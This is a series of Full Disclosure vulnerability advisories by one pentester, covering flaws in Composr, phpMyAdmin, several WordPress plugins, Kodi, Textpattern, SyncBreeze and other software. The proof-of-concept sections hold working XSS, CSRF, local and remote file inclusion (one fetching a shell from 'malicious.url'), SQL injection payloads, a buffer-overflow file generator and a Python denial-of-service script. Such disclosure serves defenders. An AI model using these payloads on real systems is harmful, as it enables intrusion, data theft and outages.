[FD] Composr CMS 10.0.30 - (Authenticated) Cross-Site Scripting

2020-05-22 Thread Manuel Garcia Cardenas
=
MGC ALERT 2020-001
- Original release date: February 06, 2020
- Last revised:  May 21, 2020
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
- CVE-ID: CVE-2020-8789
=

I. VULNERABILITY
-
Composr CMS 10.0.30 - (Authenticated) Cross-Site Scripting

II. BACKGROUND
-
Composr CMS (or Composr) is a web application for creating websites. It is
a combination of a Web content management system and Online community
(Social Networking) software. Composr is licensed as free software and
primarily written in the PHP programming language.

III. DESCRIPTION
-
Has been detected a Persistent XSS vulnerability in Composr CMS, that
allows the execution of arbitrary HTML/script code to be executed in the
context of the victim user's browser.

IV. PROOF OF CONCEPT
-
Go to: Security -> Usergroups -> Edit Usergroup

Select one Usergroup (for example Guest) and edit the Name (parameter name)
for example with Guests">alert(1)

The variable "name" it is not sanitized, later, if some user visit the
"Zone editor" area, the XSS is executed, in the response you can view:

alert(1)" />

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or Javascript code in a targeted
user's browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
Composr CMS  <= 10.0.30

VII. SOLUTION
-
Disable until a fix is available.

VIII. REFERENCES
-
https://compo.sr/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
February 06, 2020 1: Initial release
May 21, 2020 2: Last revision

XI. DISCLOSURE TIMELINE
-
February 06, 2020 1: Vulnerability acquired by Manuel Garcia Cardenas
February 06, 2020 2: Send to vendor
April 06, 2020 3: New request, vendor doesn't answer.
May 21, 2020 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery

2019-09-13 Thread Manuel Garcia Cardenas
=
MGC ALERT 2019-003
- Original release date: June 13, 2019
- Last revised:  September 13, 2019
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,3/10 (CVSS Base Score)
- CVE-ID: CVE-2019-12922
=

I. VULNERABILITY
-
phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery

II. BACKGROUND
-
phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the Web. phpMyAdmin supports a wide range of
operations on MySQL and MariaDB.

III. DESCRIPTION
-
Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows
an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any
server in the Setup page.

IV. PROOF OF CONCEPT
-
Exploit CSRF - Deleting main server

Deleting Server 1
http://server/phpmyadmin/setup/index.php?page=servers=remove=1;
style="display:none;" />

V. BUSINESS IMPACT
-
The attacker can easily create a fake hyperlink containing the request that
wants to execute on behalf the user,in this way making possible a CSRF
attack due to the wrong use of HTTP method.

VI. SYSTEMS AFFECTED
-
phpMyAdmin <= 4.9.0.1

VII. SOLUTION
-
Implement in each call the validation of the token variable, as already
done in other phpMyAdmin requests.

VIII. REFERENCES
-
https://www.phpmyadmin.net/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
June 13, 2019 1: Initial release
September 13, 2019 2: Last revision

XI. DISCLOSURE TIMELINE
-
June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
June 13, 2019 2: Send to vendor
July 16, 2019 3: New request to vendor without fix date
September 13, 2019 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
---------
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] CMS Made Simple 2.2.10 - (Authenticated) Persistent Cross-Site Scripting

2019-05-24 Thread Manuel Garcia Cardenas
=
MGC ALERT 2019-002
- Original release date: April 10, 2019
- Last revised:  May 22, 2019
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
- CVE-ID: CVE-2019-11226
=

I. VULNERABILITY
-
CMS Made Simple 2.2.10 - (Authenticated) Persistent Cross-Site Scripting

II. BACKGROUND
-
CMS Made Simple (CMSMS) is a free, open source (GPL) content management
system (CMS) to provide developers, programmers and site owners a web-based
development and administration area.

III. DESCRIPTION
-
Has been detected a Persistent XSS vulnerability in CMS Made Simple, that
allows the execution of arbitrary HTML/script code to be executed in the
context of the victim user's browser.

IV. PROOF OF CONCEPT
-
Go to: Content -> Content Manager -> News -> Add Article

And post in the m1_title parameter for example
test">alert(1)

The variable "m1_title" it is not sanitized, later, if some user visit the
content in the public area, the XSS is executed, in the response you can
view:

alert(1)

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or Javascript code in a targeted
user's browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
CMS Made Simple <= 2.2.10

VII. SOLUTION
-
Disable until a fix is available, vendor doesn't accept XSS issues inside
admin panel.

VIII. REFERENCES
-
https://www.cmsmadesimple.org/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
April 10, 2019 1: Initial release
May 22, 2019 2: Last revision

XI. DISCLOSURE TIMELINE
-
April 10, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
April 10, 2019 2: Send to vendor
April 22, 2019 3: New request, vendor doesn't accept XSS issues inside
admin panel.
May 22, 2019 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion

2019-03-16 Thread Manuel Garcia Cardenas
=
MGC ALERT 2019-001
- Original release date: February 06, 2019
- Last revised:  March 13, 2019
- Discovered by: Manuel García Cárdenas
- Severity: 7/10 (CVSS Base Score)
- CVE-ID: CVE-2019-9618
=

I. VULNERABILITY
-
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion

II. BACKGROUND
-
Hassle-free and user-friendly way to add a Media player directly to your
website.

III. DESCRIPTION
-
This bug was found in the file:

/gracemedia-media-player/templates/files/ajax_controller.php

Vulnerable code:

require_once($_GET['cfg']);

The parameter "cfg" it is not sanitized allowing include local files

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

IV. PROOF OF CONCEPT
-
The following URL have been confirmed that is vulnerable to local file
inclusion.

Local File Inclusion POC:

GET
/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds=../../../../../../../../../../etc/passwd

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
GraceMedia Media Player <= 1.0

VII. SOLUTION
-
Disable plugin until a fix is available, vendor does not fix after 2
requests.

VIII. REFERENCES
-
https://es.wordpress.org/plugins/gracemedia-media-player/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
February 06, 2019 1: Initial release
March 13, 2019 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
February 06, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
February 06, 2019 2: Email to vendor without response
February 21, 2019 3: Second email to vendor without response
March 13, 2019 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
---------
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] WordPress Plugin Localize My Post 1.0 - Local File Inclusion

2018-09-20 Thread Manuel Garcia Cardenas
=
MGC ALERT 2018-006
- Original release date: August 31, 2018
- Last revised:  September 19, 2018
- Discovered by: Manuel García Cárdenas
- Severity: 7/10 (CVSS Base Score)
- CVE-ID: CVE-2018-16299
=

I. VULNERABILITY
-
WordPress Plugin Localize My Post 1.0 - Local File Inclusion

II. BACKGROUND
-
This plugin makes it super easy to add and manage locations in your posts
and pages

III. DESCRIPTION
-
This bug was found in the file:

/localize-my-post/ajax/include.php

include($_REQUEST['file']);

The parameter "file" it is not sanitized allowing include local files

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

IV. PROOF OF CONCEPT
-
The following URL have been confirmed that is vulnerable to local file
inclusion.

Local File Inclusion POC:

GET
/wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
Localize My Post <= 1.0

VII. SOLUTION
-
Disable plugin until a fix is available.
https://github.com/julianburr/wp-plugin-localizemypost/issues/1

VIII. REFERENCES
-
https://es.wordpress.org/plugins/localize-my-post/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
August 31, 2018 1: Initial release
September 19, 2018 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
August 31, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
August 31, 2018 2: Email to vendor without response
September 10, 2018 3: Second email to vendor without response
September 19, 2018 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
---------
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] WordPress Plugin Wechat Broadcast 1.2.0 - Local/Remote File Inclusion

2018-09-20 Thread Manuel Garcia Cardenas
=
MGC ALERT 2018-005
- Original release date: August 31, 2018
- Last revised:  September 19, 2018
- Discovered by: Manuel García Cárdenas
- Severity: 9/10 (CVSS Base Score)
- CVE-ID: CVE-2018-16283
=

I. VULNERABILITY
-
WordPress Plugin Wechat Broadcast 1.2.0 - Local/Remote File Inclusion

II. BACKGROUND
-
Wechat Broadcast allow push to the WeChat public account subscriber

III. DESCRIPTION
-
This bug was found in the file:

/wechat-broadcast/wechat/Image.php

echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');

The parameter "url" it is not sanitized allowing include local or remote
files

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

IV. PROOF OF CONCEPT
-
The following URL have been confirmed that is vulnerable to local and
remote file inclusion.

Local File Inclusion POC:

GET
/wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd

Remote File Inclusion POC:

GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=
http://malicious.url/shell.txt

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
Wechat Broadcast <= 1.2.0

VII. SOLUTION
-
Disable plugin until a fix is available.
https://github.com/springjk/wordpress-wechat-broadcast/issues/14

VIII. REFERENCES
-
https://es.wordpress.org/plugins/wechat-broadcast/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
August 31, 2018 1: Initial release
September 19, 2018 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
August 31, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
August 31, 2018 2: Email to vendor without response
September 10, 2018 3: Second email to vendor without response
September 19, 2018 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection

2018-06-14 Thread Manuel Garcia Cardenas
=
MGC ALERT 2018-004
- Original release date: May 10, 2018
- Last revised:  June 11, 2018
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
- CVE-ID: CVE-2018-10969
=

I. VULNERABILITY
-
WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection

II. BACKGROUND
-
Pie-Register is a quick and easy way to brand your Registration Pages on
WordPress sites.

III. DESCRIPTION
-
This bug was found using the portal in the files:

/pie-register/classes/invitation_code_pagination.php:if ( isset(
$_GET['order'] ) && $_GET['order'] )
/pie-register/classes/invitation_code_pagination.php:$order =
$_GET['order'];

And when the query is executed, the parameter "order" it is not sanitized.

/pie-register/classes/invitation_code_pagination.php:$this->order =
esc_sql( $order );

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

It is possible to inject SQL code.

IV. PROOF OF CONCEPT
-
The following URL have been confirmed to all suffer from Time Based SQL
Injection.

Time Based SQL Injection POC:

GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes=name=desc
(original)

GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes=name=desc%2c(select*from(select(sleep(2)))a)
HTTP/1.1(2 seconds of response)

GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes=name=desc%2c(select*from(select(sleep(30)))a)
HTTP/1.1(30 seconds of response)

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
Pie Register <= 3.0.9

VII. SOLUTION
-
Disable website until a fix is available.

VIII. REFERENCES
-
https://es.wordpress.org/plugins/pie-register/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
May 10, 2018 1: Initial release
June 11, 2018 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
May 10, 2018 2: Send to vendor without response
June 05, 2018 3: Second email to vendor without response
June 11, 2018 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-----
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Kodi <= 17.6 - Persistent Cross-Site Scripting

2018-04-17 Thread Manuel Garcia Cardenas
=
MGC ALERT 2018-003
- Original release date: March 19, 2018
- Last revised:  April 16, 2018
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
- CVE-ID: CVE-2018-8831
=

I. VULNERABILITY
-
Kodi <= 17.6 - Persistent Cross-Site Scripting

II. BACKGROUND
-
Kodi (formerly XBMC) is a free and open-source media player software
application developed by the XBMC Foundation, a non-profit technology
consortium. Kodi is available for multiple operating systems and hardware
platforms, with a software 10-foot user interface for use with televisions
and remote controls.

III. DESCRIPTION
-
Has been detected a Persistent XSS vulnerability in the web interface of
Kodi, that allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser.

IV. PROOF OF CONCEPT
-
Go to: Playlist -> Create

Create a playlist injecting javascript code:



The XSS is executed, in the victim browser.

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
Kodi <= 17.6

VII. SOLUTION
-
Vendor include the fix:
https://trac.kodi.tv/ticket/17814

VIII. REFERENCES
-
https://kodi.tv/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
March 19, 2018 1: Initial release
April 16, 2018 2: Last revision

XI. DISCLOSURE TIMELINE
-
March 19, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
March 19, 2018 2: Send to vendor
March 30, 2018 3: Vendo fix
April 16, 2018 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
---------
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] SQL Injection in Textpattern <= 4.6.2

2018-03-13 Thread Manuel Garcia Cardenas
=
MGC ALERT 2018-002
- Original release date: February 12, 2018
- Last revised:  March 12, 2018
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
- CVE-ID: CVE-2018-7474
=

I. VULNERABILITY
-
SQL Injection in Textpattern <= 4.6.2

II. BACKGROUND
-
Textpattern is a free and open-source content management system (CMS) based
on PHP and MySQL, originally developed by Dean Allen and now developed by
Team Textpattern.

III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

It is possible to inject SQL code in the variable "qty" on the page
"index.php".

IV. PROOF OF CONCEPT
-
The following URL's and parameters have been confirmed to all suffer from
SQL injection.

/textpattern/textpattern/index.php?event=link=link_change_pageby=50&_txp_token=baa07ba857d3618ef810b725b9d4d9d8

Note: the variable "_txp_token" doest not work as a anti-csrf.

POC:

/textpattern/textpattern/index.php?event=link=link_change_pageby=50%20into%20outfile%20'%
5cfakesite.com%5c'%3b%20--%20&_txp_token=baa07ba857d3618ef810b725b9d4d9d8

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
Textpattern <= 4.6.2

VII. SOLUTION
-
Disable website until a fix is available.

VIII. REFERENCES
-
https://textpattern.com/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
February 12, 2018 1: Initial release
March 12, 2018 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
February 12, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
February 12, 2018 2: Send to vendor without response
February 26, 2018 3: Second email to vendor without response
March 12, 2018 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] PyroBatchFTP <= 3.18 - Local Buffer Overflow (SEH)

2018-01-13 Thread Manuel Garcia Cardenas
=
MGC ALERT 2018-001
- Original release date: December 22, 2017
- Last revised:  January 12, 2018
- Discovered by: Manuel García Cárdenas
- Severity: 7,5/10 (CVSS Base Score)
=

I. VULNERABILITY
-
PyroBatchFTP <= 3.18 - Local Buffer Overflow (SEH)

II. BACKGROUND
-
PyroBatchFTP is a Windows software that lets you exchange files with FTP,
FTPS or SFTP servers in an automatic and unattended way, using a simple yet
powerful batch/script language.

III. DESCRIPTION
-
The Enterprise version of PyroBatchFTP is affected by a Local Buffer
Overflow vulnerability.

The application does not check bounds when reading the file that will
execute the script, resulting in a classic Buffer Overflow overwriting SEH
handler.

To exploit the vulnerability only is needed create a local script to
interact with the application.

IV. PROOF OF CONCEPT
-

my $file= "crash.cmd";
my $junk= "A" x 2052;
my $nseh = "";
my $seh = "";
open($FILE,">$file");
print $FILE $junk.$nseh.$seh;
close($FILE);
print "File Created successfully\n";

V. BUSINESS IMPACT
-
Availability compromise can result from these attacks.

VI. SYSTEMS AFFECTED
-
PyroBatchFTP <= 3.18

VII. SOLUTION
-
Vendor release 3.19 version
http://www.emtec.com/downloads/pyrobatchftp/pyrobatchftp319_changes.txt

VIII. REFERENCES
-
https://www.emtec.com/pyrobatchftp/index.html

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
December 22, 2017 1: Initial release
January 12, 2018 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
---------
December 22, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
December 22, 2017 2: Send to vendor
January 12, 2018 3: Vendor fix the vulnerability and release a new version
January 12, 2018 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SyncBreeze <= 10.2.12 - Denial of Service

2017-12-15 Thread Manuel Garcia Cardenas
=
MGC ALERT 2017-007
- Original release date: November 30, 2017
- Last revised:  December 14, 2017
- Discovered by: Manuel García Cárdenas
- Severity: 7,5/10 (CVSS Base Score)
- CVE-ID: CVE-2017-17088
=

I. VULNERABILITY
-
SyncBreeze <= 10.2.12 - Denial of Service

II. BACKGROUND
-
SyncBreeze is a fast, powerful and reliable file synchronization solution
for local disks, network shares, NAS storage devices and enterprise storage
systems.

III. DESCRIPTION
-
The Enterprise version of SyncBreeze is affected by a Remote Denial of
Service vulnerability.

The web server does not check bounds when reading server request in the
Host header on making a connection, resulting in a classic Buffer Overflow
that causes a Denial of Service.

To exploit the vulnerability only is needed use the version 1.1 of the HTTP
protocol to interact with the application.

IV. PROOF OF CONCEPT
-
#!/usr/bin/python
import sys, socket

host = sys.argv[1]
buffer="GET / HTTP/1.1\r\n"
buffer+="Host: "+"A"*2000+"\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 80))
s.send(buffer)
s.close()

V. BUSINESS IMPACT
-
Availability compromise can result from these attacks.

VI. SYSTEMS AFFECTED
-
SyncBreeze <= 10.2.12

VII. SOLUTION
-
Vendor release 10.3 version
http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.3.14.exe

VIII. REFERENCES
-
http://www.syncbreeze.com/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
November 30, 2017 1: Initial release
December 14, 2017 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
November 30, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
November 30, 2017 2: Send to vendor
December 6,  2017 3: Vendor fix the vulnerability and release a new version
December 14, 2017 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Backdrop CMS <= 1.7.1 - Persistent Cross-Site Scripting

2017-08-23 Thread Manuel Garcia Cardenas
=
MGC ALERT 2017-005
- Original release date: July 11, 2017
- Last revised:  August 18, 2017
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Backdrop CMS <= 1.7.1 - Persistent Cross-Site Scripting

II. BACKGROUND
-
Backdrop CMS is a simple, lightweight, and easy to use Content Management
System used to build attractive, professional websites.

III. DESCRIPTION
-
Has been detected a Persistent XSS vulnerability in Backdrop CMS, that
allows the execution of arbitrary HTML/script code to be executed in the
context of the victim user's browser.

IV. PROOF OF CONCEPT
-
Go to: Structure -> Content types -> Add content type

And post:

POST /backdrop/admin/structure/types/add HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101
Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 605
Referer: http://127.0.0.1/backdrop/admin/structure/types/add
Cookie: Backdrop.tableDrag.showWeight=0;
PHPSESSID=libl3ge64tv5vajangccjhifu2; phpwcmsBELang=en;
phpwcmsBEItemsPerPage=50; _ctr=MTI3XzBfMF8xLlpa;
nv4_cltz=120.60.120%257C%252F%257C;
nv4_cltn=RXVyb3BlL0Ftc3RlcmRhbS43MjAwLjE%3D;
nv4c_x4OOk_ctr=MTI3XzBfMF8xLlpa; nv4c_x4OOk_cltz=120.60.120%257C%252F%257C;
gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0;
gnew_language=english; gnew_template=clean;
SESSaca5a63f4c2fc739381fab7741d68783=X4OPoKhvYQz8Q8QwCrVpgq3JuG4fQ84n1XpQQH0SCjo
Connection: close
Upgrade-Insecure-Requests: 1

name=test%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E=test_script_alert=_label=Demo=_default=1_enabled=1_enabled=1_pattern=%5Bnode%3Acontent-type%5D%2F%5Bnode%3Atitle%5D_enabled=1_submitted=1_user_picture=1_default=2_per_page=50_mode=1_user_picture=1_form_location=1_preview=1_settings__active_tab=_build_id=form-biLaugWmv7Z4fGmSK73PYxQZo7hgIwxL2gRwijtrBFA_token=j4801oRGZnTQshQQdJ1IKF7-doK6IhB51F1d4nIPwY4_id=node_type_form=Save+and+add+fields

The variable "name" it is not sanitized, later, if you go to the content
type created and click in "Manage Displays"

GET /backdrop/admin/structure/types/manage/test-script-alert/display
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101
Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate

The XSS is executed, in the response you can view:

Manage display Customized for test">alert(/XSS/) 

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
Backdrop CMS <= 1.7.1

VII. SOLUTION
-
Install the last release:
https://github.com/backdrop/backdrop/releases/tag/1.7.2

VIII. REFERENCES
-
https://backdropcms.org/security/backdrop-sa-core-2017-009

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
July 11, 2017 1: Initial release
August 18, 2017 2: Last revision

XI. DISCLOSURE TIMELINE
-
July 11, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
July 11, 2017 2: Send to vendor
August 17, 2017 3: Vendo fix in 1.7.2 version
August 18, 2017 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] SQL Injection in TheoCMS <= 2.0

2017-08-11 Thread Manuel Garcia Cardenas
=
MGC ALERT 2017-004
- Original release date: July 11, 2017
- Last revised:  August 12, 2017
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
SQL Injection in TheoCMS <= 2.0

II. BACKGROUND
-
Theo CMS is an ultra lightweight Content Management System for all types of
websites.

III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

It is possible to inject SQL code in the variable "cat" on the page
"admin.php".

IV. PROOF OF CONCEPT
-
The following URL's and parameters have been confirmed to all suffer from
SQL injection.

/theocms/core/admin.php?cat=0

POC:

/theocms/core/admin.php?cat=0+union+select+1,@@version,3,4+from+cfgs
/theocms/core/admin.php?cat=0+union+select+1,@@hostname,3,4+from+cfgs
/theocms/core/admin.php?cat=0+union+select+1,concat(cfg,data),3,4+from+cfgs

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
TheoCMS <= 2.0

VII. SOLUTION
-
Disable website until a fix is available.

VIII. REFERENCES
-
http://theocms.com

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
July 11, 2017 1: Initial release
August 12, 2017 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
July 11, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
July 11, 2017 2: Send to vendor
July 11, 2017 3: Vendor answer that is not a critical vulnerability an SQL
Injection y admin page
